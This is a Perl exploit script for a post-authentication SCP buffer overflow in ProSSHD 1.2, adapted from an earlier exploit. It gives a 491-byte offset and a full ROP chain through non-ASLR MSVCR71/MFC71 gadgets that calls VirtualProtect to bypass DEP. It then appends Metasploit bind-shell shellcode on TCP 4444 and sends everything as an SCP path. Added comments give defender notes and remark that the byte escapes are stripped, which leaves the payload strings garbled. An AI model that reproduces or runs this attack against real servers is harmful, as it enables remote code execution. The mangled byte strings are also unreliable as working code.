# Title : ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Published : 2010-05-03
# Author : Alexey Sintsov
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP enabled for all programs
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: -
#!/usr/bin/perl
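use strict;
use warnings;
use Net::SSH2;

# Target and account used for the SCP request at the end of the script.
# The bug is reached post-auth, so a valid account on the target is needed;
# the published listing leaves both fields empty.
my $username = '';
my $password = '';
my $host     = '192.168.126.129';    # Remote host
#$host = '192.168.13.6';
my $port     = 22;

# Script-wide state that is assigned further down (payload string, request
# buffer, session handle, scp_get() result).  Declared here so the whole
# script compiles under strict without touching the later statements.
my ($shell, $fuzz, $ssh2, $scpget);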
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
#
# Stage appended to the tail of the request buffer (after the ROP chain and
# the NOP run in $fuzz); it only runs once the VirtualProtect call in the
# chain has made the stack executable.  From the defender's side this is a
# bind shell on TCP/4444 opened by the sshd process, which is the
# post-exploitation artefact to look for.
# NOTE(review): as reproduced on this page the literal's escape sequences
# are not intact (each byte appears as `xNN` with no backslash), so the text
# below is plain ASCII, not the encoded stage the header describes.
$shell =
"xbaxdax29x13xdaxd9xe9xd9x74x24xf4x58x31xc9" .
"xb1x56x31x50x13x83xc0x04x03x50xd5xcbxe6x26" .
"x01x82x09xd7xd1xf5x80x32xe0x27xf6x37x50xf8" .
"x7cx15x58x73xd0x8exebxf1xfdxa1x5cxbfxdbx8c" .
"x5dx71xe4x43x9dx13x98x99xf1xf3xa1x51x04xf5" .
"xe6x8cxe6xa7xbfxdbx54x58xcbx9ex64x59x1bx95" .
"xd4x21x1ex6axa0x9bx21xbbx18x97x6ax23x13xff" .
"x4ax52xf0xe3xb7x1dx7dxd7x4cx9cx57x29xacxae" .
"x97xe6x93x1ex1axf6xd4x99xc4x8dx2exdax79x96" .
"xf4xa0xa5x13xe9x03x2ex83xc9xb2xe3x52x99xb9" .
"x48x10xc5xddx4fxf5x7dxd9xc4xf8x51x6bx9exde" .
"x75x37x45x7ex2fx9dx28x7fx2fx79x95x25x3bx68" .
"xc2x5cx66xe5x27x53x99xf5x2fxe4xeaxc7xf0x5e" .
"x65x64x79x79x72x8bx50x3dxecx72x5ax3ex24xb1" .
"x0ex6ex5ex10x2exe5x9ex9dxfbxaaxcex31x53x0b" .
"xbfxf1x03xe3xd5xfdx7cx13xd6xd7x0bx13x18x03" .
"x58xf4x59xb3x4fx58xd7x55x05x70xb1xcexb1xb2" .
"xe6xc6x26xccxccx7axffx5ax58x95xc7x65x59xb3" .
"x64xc9xf1x54xfex01xc6x45x01x0cx6ex0fx3axc7" .
"xe4x61x89x79xf8xabx79x19x6bx30x79x54x90xef" .
"x2ex31x66xe6xbaxafxd1x50xd8x2dx87x9bx58xea" .
"x74x25x61x7fxc0x01x71xb9xc9x0dx25x15x9cxdb" .
"x93xd3x76xaax4dx8ax25x64x19x4bx06xb7x5fx54" .
"x43x41xbfxe5x3ax14xc0xcaxaax90xb9x36x4bx5e" .
"x10xf3x7bx15x38x52x14xf0xa9xe6x79x03x04x24" .
"x84x80xacxd5x73x98xc5xd0x38x1ex36xa9x51xcb" .
"x38x1ex51xde";
# Request buffer handed to scp_get() at the end of the script: 491 bytes of
# filler up to the saved return address, then a ROP chain built only from
# gadgets in the two non-ASLR modules that ship with ProSSHD (MSVCR71.DLL and
# MFC71.DLL), a VirtualProtect call that makes the stack executable, and
# finally $shell.  As laid out here the buffer is roughly 2 KB.
#
# Mitigation note: the chain depends entirely on those two modules loading at
# fixed addresses; the same overflow against modules built with ASLR support
# would leave the attacker without stable gadget addresses.  On the wire the
# trigger is an authenticated SCP request whose path is ~2 KB of mostly
# non-printable bytes, which is a straightforward thing to alert on.
# (As with $shell, the escape backslashes are missing in this reproduction.)
$fuzz = "x41"x491 . # buffer before RET addr rewriting
############################### ROP
# All ROP instructions from non ASLR modules (coming with ProSSHD distrib): MSVCR71.DLL and MFC71.DLL
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this makes the stack executable:
#### RET rewrite###
"x9Fx07x37x7C". # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points at our stack data with some offset
"x11x11x11x11". # JUNK---------------^^^ ^^^
"x22x22x22x22". # JUNK-------------------------^^^
"x27x34x34x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"x33x33x33x33". # JUNK------------------------------^^^
"xC1x4Cx34x7C". # POP EAX / RETN
# ^^^
"x33x33x33x33". # ^^^  (consumed by the RETN 10 above)
"x33x33x33x33". # ^^^
"x33x33x33x33". # ^^^
"x33x33x33x33". # ^^^
# ^^^
"xC0xFFxFFxFF". # ----^^^ Param for next instruction...
"x05x1ex35x7C". # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)
"xc8x03x35x7C". # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)
"x40xa0x35x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
"xA1x1Dx34x7C". # DEC EAX / RETN ; Change position
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN ; EAX=ECX-0x0c
"x08x94x16x7C". # MOV DS:[EAX+0x4], EAX / RETN ; save address for VirtualProtect (1 param)
"xB9x1Fx34x7C". # INC EAX / RETN ; oh ... and move pointer back
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN ; EAX=ECX=0x8
"xB2x01x15x7C". # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)
"xA1x1Dx34x7C". # DEC EAX / RETN ; Change position for output from VirtualProtect
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"xA1x1Dx34x7C". # DEC EAX / RETN
"x27x34x34x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"x33x33x33x33". # JUNK------------------------------^^^
"x40xa0x35x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
# (consumed by the RETN 10 above)
"x33x33x33x33". #
"x33x33x33x33". #
"x33x33x33x33". #
"x33x33x33x33". #
"xB9x1Fx34x7C". # INC EAX / RETN ; and again...
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xB9x1Fx34x7C". # INC EAX / RETN
"xE5x6Bx36x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)
"xBAx1Fx34x7C"x204 . # RETN fill.....
"xDDx28x35x7C". # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect
"AAAABBBBCCCCDDDD". # Placeholder for the VirtualProtect parameters (filled in by the writes above)
####################### return into the stack after VirtualProtect
"x1AxF2x35x7C". # ADD ESP, 0xC / RETN ; take next ret
"XXXYYYZZZ123". # trash
"x30x5Cx34x7C". # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --> PUSH ESP / RETN ; EIP=ESP
"x90"x14 . # NOPs: here is the beginning of shellcode
$shell; # shellcode 8)
# Open the session and authenticate first (the bug is post-auth), then hand
# the crafted buffer to the server as the path of an SCP get request; that
# single request is the trigger.  The session is closed regardless of the
# result, so a surviving server would just see one oversized SCP path.
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)
    or die "nError: Connection Refused!n";
$ssh2->auth_password($username, $password)
    or die "nError: Username/Password Denied!n";
#sleep(10);
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();